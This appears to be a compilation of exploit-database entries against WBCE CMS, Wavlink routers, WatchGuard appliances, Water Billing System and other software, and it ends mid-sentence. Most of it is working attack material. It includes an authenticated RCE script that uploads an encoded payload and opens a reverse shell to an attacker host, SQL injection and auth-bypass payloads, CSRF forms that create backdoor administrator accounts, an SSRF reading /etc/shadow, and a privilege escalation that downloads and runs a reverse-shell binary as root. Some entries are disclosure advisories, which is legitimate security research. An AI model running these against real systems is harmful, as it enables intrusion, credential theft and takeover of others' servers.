PAYLOAD = 'UEsDBBQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMAAAAdDE4YmtuZXYucGhwhVVtT9swEP6OxH8wUaQmUqAJ24epUSYh6CY0CbQC2weGIje5UKuJndkOhSH++85OQqqqtBIizr08eZ6783U8nujoy3zJ4enwAF8ODxToVLMK0pJVTHuhH7u/prOby+urxIlOQid2WZ246Wz68256c3vvSHhKWe08xG4tpN70GJvxZYuGL1PF/kESfQ7D2F1JpiGlCW/KMnZBSiHf39QCyjIZNZxWQI5pTFYxYXlMxnPGx2pBjtkodnMKleBJiCeYN494YIVXNDzTTPAUnpnSyhvVGddlWgi5HPn+q1uzPBlMnm9yrDE5jvzXWjKuUbMznc2uZxNyTvlIExPp+DE8oyfy47cuxX+1lrC11EKx51SBViz3/E04o66H62PWIXsxUfwGpQIypP4+m11dXn2fkG+UlZATLUgbyxScEHK7YIrg39+GaSCZqNBDKM8JF0icalqeOIifLXImPWeM56aiamm7qkS2TArzX9TAPWxrYFsYmG5wYR9Ky+BTaMt0ZBPWVHV+4rXxG4JAZZLVWkhVQ5ZQKemLFyZf24NTsxqcwJGOH0SbxhUaT7cYkXItRQZKJeaZWtbtrAQb3wtck6Za3kylEpRoZAZej+B/1GxV0xUnFnRdD+oEWpn+pvMSy8D4o9d+4z58CLBAOwKifQGnHwbYkhvnO9mbJjP8C7wnL8RUAHKC9wykgpa1mRBs5cS2EiWsFqwE1PBqbgeIosXcov/GZmeCc7BXiGiQFeNUQ44wcyS3jN86kEHah0BdobeiuPjIU9pORSdyKNZ7VbDhvKnSbEH5I+SpCQOtkvdClUjU67CCfqEE/S4JzC6xE8B4uv6lLsO3JWmXhz/U9/r8B5lNzy6Qrct43eikMPF97rDHEHp7+oS0iYhQWFJrk9J6cKDWaQ3Sd1O7vbi+u91GbkDYT9CCbKFo5O2kd7qfHg7ALnqnu+kNIHvpvRVZKVRnxiD7NpR50xJtWuxw2SVircNaiPsfENJTcpXG06OVfNTt6W7mnc73hztI6fBAgm4kJ2H8H1BLAQI/ABQAAAAIAI1+n1Peb3ztBAMAAFUHAAAMACQAAAAAAAAAIAAAAAAAAAB0MThia25ldi5waHAKACAAAAAAAAEAGACAuZAFVv7XAYC5kAVW/tcB6Bk8KTf+1wFQSwUGAAAAAAEAAQBeAAAALgMAAAAA'
def main():
parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)')
parser.add_argument('-x', '--url', type=str, required=True)
parser.add_argument('-u', '--user', type=str, required=False)
parser.add_argument('-p', '--password', type=str, required=False)
parser.add_argument('-ah', '--attacker_host', type=str, required=False)
parser.add_argument('-ap', '--attacker_port', type=str, required=False)
args = parser.parse_args()
print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
exploit(args, PAYLOAD)
def exploit(args, payload):
s2 = requests.Session()
#login
body= {'url':'','username_fieldname':'username_t18bknev','password_fieldname':'password_t18bknev','username_t18bknev':args.user,'password_t18bknev':args.password}
r = s2.post(args.url+'/admin/login/index.php', data=body, allow_redirects=False)
if(r.status_code==302 and r.headers['location'].find('/start/') != -1):
print("[*] Login OK")
else:
print("[*] Login Failed")
exit(1)
time.sleep(1)
#create droplet
up = {'userfile':('t18bknev.zip', io.BytesIO(base64.b64decode(PAYLOAD)), "multipart/form-data")}
r = s2.post(args.url+'/admin/admintools/tool.php?tool=droplets&upload=1', files=up)
if(r.status_code==200 and r.text.find('1 Droplet(s) imported') != -1):
print("[*] Droplet OK")
else:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
#get csrf token
r = s2.get(args.url+'/admin/pages/index.php')
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'formtoken'})['value']
#create page
body= {'formtoken':formtoken,'title':'t18bknev','type':'wysiwyg','parent':'0','visibility':'public','save':''}
r = s2.post(args.url+'/admin/pages/add.php', data=body, allow_redirects=False)
soup = BeautifulSoup(r.text, 'html.parser')
try:
page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1]
print("[*] Page OK ["+page_id+"]")
except:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
#get csrf token
print("[*] Getting token")
r = s2.get(args.url+'/admin/pages/modify.php?page_id='+page_id)
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'formtoken'})['value']
section_id = soup.find('input', {'name':'section_id'})['value']
time.sleep(1)
#add droplet to page
body= {'page_id':page_id,'formtoken':formtoken,'section_id':section_id,'content'+section_id:'[[t18bknev]]','modify':'save'}
r = s2.post(args.url+'/modules/wysiwyg/save.php', data=body, allow_redirects=False)
if(r.status_code==200 and r.text.find('Page saved') != -1):
print("[*] Adding droplet OK")
else:
print("[*] Exploit Failed")
exit(1)
time.sleep(1)
input("Please make sure that your nc listner is ready...\n\nPRESS ENTER WHEN READY")
body= {'rev_ip':args.attacker_host,'rev_port':args.attacker_port}
r = s2.post(args.url+'/pages/t18bknev.php', data=body, allow_redirects=False)
if(r.status_code==200):
print("[*] Exploit OK - check your listner")
exit(0)
else:
print("[*] Exploit Failed")
exit(1)
if __name__ == '__main__':
main()
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
import requests
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
'User-Agent': 'Mozilla/5.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close'
}
_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0
# Date: 15.11.2023
# Exploit Author: young pope
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip
# Version: 1.6.0
# Tested on: Kali linux
# CVE : CVE-2023-39796
There is an sql injection vulnerability in *miniform* module which is a
default module installed in the *WBCE* cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.
In file /modules/miniform/ajax_delete_message.php there is no
authentication check. On line |40| in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign - ```.
Function |addslashes()|
(https://www.php.net/manual/en/function.addslashes.php) escapes only
these characters and not a tick sign:
* single quote (')
* double quote (")
* backslash ()
* NUL (the NUL byte
The DB_RECORD_TABLE parameter is vulnerable.
If an unauthenticated attacker send this request:
```
POST /modules/miniform/ajax_delete_message.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 162
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record
```
The response is received after 6s.
Reference links:
* https://nvd.nist.gov/vuln/detail/CVE-2023-39796
* https://forum.wbce.org/viewtopic.php?pid=42046#p42046
* https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
* https://pastebin.com/PBw5AvGp
source: https://www.securityfocus.com/bid/53202/info
Waylu CMS is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
HTML Injection
http://www.example.com/WebApps/products_xx.php?id=[XSS]
SQL Injection
http://www.example.com/WebApps/products_xx.php?id=[SQL Injection]
# Exploit title: Wavpack 5.1.0 - Denial of Service
# Date: 20.02.2018
# Exploit Author: r4xis
# https://github.com/r4xis
#
# Vendor Homepage: http://www.wavpack.com/
# Software Links: http://www.wavpack.com/downloads.html
# https://github.com/dbry/WavPack
#
#
# Version: Wavpack 5.1.0
# Tested on: Debian 9.3.0 64 bit
# Windows 7 32 bit and 64 bit
# Windows 8 64 bit
#
#
# CVE: CVE-2018-7254
# CVE Details:
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
# https://github.com/dbry/WavPack/issues/26
import os
head = "\x63\x61\x66\x66"
version = "\x00\x01"
junk1 = "\x00"*(0xa0-6)
crash = "\x80"
junk2 = "\x00"*100
f=open("poc.caf", 'w')
f.write(head+version+junk1+crash+junk2)
f.close()
os.system("wavpack poc.caf")
'''
Debian gdb output:
Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms ()
at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
'''
# Exploit Title: Wavlink WN533A8 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34046
# Tested on: Windows
# Exploit
view-source:http://IP_ADDRESS/sysinit.shtml
search for var syspasswd="
you will find the username and the password
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows
# Poc code
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
<input type="hidden" name="newUI" value="1" />
<input type="hidden" name="page" value="login" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="langChange" value="0" />
<input type="hidden" name="ipaddr" value="196.219.234.10" />
<input type="hidden" name="login_page" value="x");alert(9);x=("" />
<input type="hidden" name="homepage" value="main.shtml" />
<input type="hidden" name="sysinitpage" value="sysinit.shtml" />
<input type="hidden" name="wizardpage" value="wiz.shtml" />
<input type="hidden" name="hostname" value="59.148.80.138" />
<input type="hidden" name="key" value="M94947765" />
<input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
<input type="hidden" name="lang_select" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Wavlink WN530HG4 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows
# Exploit
view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password
# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-24
# Vendor Homepage: https://www.dell.com/
# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
# Tested Version: 1.1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """
Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto
# Service info:
C:\>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Waves Audio Service: http://www.maxx.com
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Max audio drivers (dell default ones) installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\WINDOWS\system32>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : 2019-8982
# Description
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
# Line 419-430
@ExposeToClient
public String getContent(String inUrl) throws IOException {
try {
String str = getRemoteContent(inUrl);
str = str.replace("<head>", "<head><base href='" + inUrl
+ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
return str;
} catch (Exception e) {
return "";
}
}
# Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
# SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it...
# Exploit Author: Sarang Tumne (CyberInsane)
# Date: 4th Nov, 2020
# Confirmed on release 1.0
# Tested on: Windows Server 2016- XAMPP
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
###############################################
POST /wbs/process.php HTTP/1.1
Host: 192.168.56.102:8080
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.102:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.56.102:8080/wbs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username='%20or%200%3d0%20#&password=password
Response:
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2020 04:30:51 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
X-Powered-By: PHP/7.2.30
Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8
<script>windows: location="billing.php"</script>
=========================================================================
POST /wbs/process.php HTTP/1.1
Host: 192.168.56.102:8080
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.102:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.56.102:8080/wbs/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
username=admin&password=a'%20or%20'a'%20%3d%20'a
Response:
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2020 04:30:49 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
X-Powered-By: PHP/7.2.30
Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8
<script>windows: location="billing.php"</script>
# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)
# Date: 2020-11-14
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: Apache2 and Windows 10
Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/WBS/user.php
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
-------------------------------------------------------------------------
Source Code: edituser.php
..
..
..
$user_id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");
..
..
-------------------------------
Vulnerable param: id
-------------------------------------------------------------------------
GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Cookie: COOKIE
Upgrade-Insecure-Requests: 1
-------------------------------------------------------------------------
Source Code: \WBS\viewbill.php
..
..
..
$id =$_REQUEST['id'];
$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'");
..
..
-------------------------------
# Exploit Title: Watchr 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9PN12GNX62VZ
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "watchr.txt"
# Copy the text from the generated watchr.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 8145
payload = buffer
try:
f=open("watchr.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Watchguard XCS Multiple Vulnerabilities
Affected versions: Watchguard XCS <=10.0
PDF:
http://www.security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
+-----------+
|Description|
+-----------+
The Watchguard XCS virtual appliance contains a number of
vulnerabilities, including unauthenticated SQL injection, command
execution and privilege escalation. By combining these vulnerabilities,
an attacker may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==SQL Injection==
Unauthenticated SQL injection is possible through the “sid” cookie
parameter in the Watchguard XCS web interface due to a PHP script that
insecurely constructs an SQL query using that value. Stacked queries are
possible, and allow insertion of a backdoor web interface user into the
database. The following POC shows the insertion of a backdoor user, and
a python snippet that can be used to construct the Watchguard XCS
specific password hashes.
[SQLi POC]
GET /borderpost/imp/compose.php3 HTTP/1.1
Host: [HOST]
Cookie: sid=1%3BINSERT INTO sds_users (self, login, password, org,
priv_level, quota, disk_usage) VALUES(99, 'backdoor',
'0b75e2443d3c813d91ac5b91106a70ad', 0, 'server_admin', 0, 0)--
[Python Password Hash Generator]
import hashlib
def gen_hash(pass_clear):
PRE_SALT = "BorderWare "
POST_SALT = " some other random (9) stuff"
t1 = hashlib.md5(PRE_SALT + pass_clear + POST_SALT).hexdigest()
t2 = hashlib.md5(pass_clear + t1).hexdigest()
return t2
print gen_hash("backdoor")
==Command Injection==
The web interface of XCS contains a command injection vulnerability,
allowing an authenticated web application user to execute system
commands as the "nobody" user. The vulnerability is in the id parameter
of the "mailqueue.spl" page.
[POC]
GET /ADMIN/mailqueue.spl?f=dnld&id=;id;uname%20-a
Host: [HOST]
Cookie: [VALID COOKIE]
==Privilege Escalation==
Privilege Escalation
There are multiple methods to escalate privileges to root after
obtaining a shell. The "FixCorruptMail" script exploit is shown below,
an additional method is detailed in the accompanying PDF. Privilege
escalation is possible by exploiting the /usr/local/bin/FixCorruptMail
script when it is called by root's crontab every three minutes. This
script reads a file “badqids” from the /var/tmp directory, and
constructs a shell command using some of the contents.
[POC]
touch /tmp/dummyfile
/usr/local/sbin/curl -s http://[REVERSE_SHELL.elf] -o /tmp/revshell
chmod +x /tmp/revshell
echo "../../../../../../tmp/dummyfile;/tmp/revshell" > /var/tmp/badqids
The executable "/tmp/revshell" will be executed within three minutes by
the root user.
+----------+
| Solution |
+----------+
Apply the relevant XCS security hotfix (Build 150522) as provided by
Watchguard.
+-------------------+
|Disclosure Timeline|
+-------------------+
12/05/2015 - Email sent to confirm vendor security contact address is valid.
13/05/2015 - Response from vendor confirming address is valid.
13/05/2015 - Sent advisory through to vendor.
13/05/2015 - Vendor confirms receipt of advisory.
27/05/2015 - Vendor sends update on fixes, states a release will be
published shortly.
09/06/2015 - Security hotfixes released for Watchguard XCS v10.0 and v9.2.
29/06/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is Australasia's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout the Asia Pacific region. Our
clients include some of the largest globally recognised companies in
areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a
high level of technical expertise while creating long and lasting
professional relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
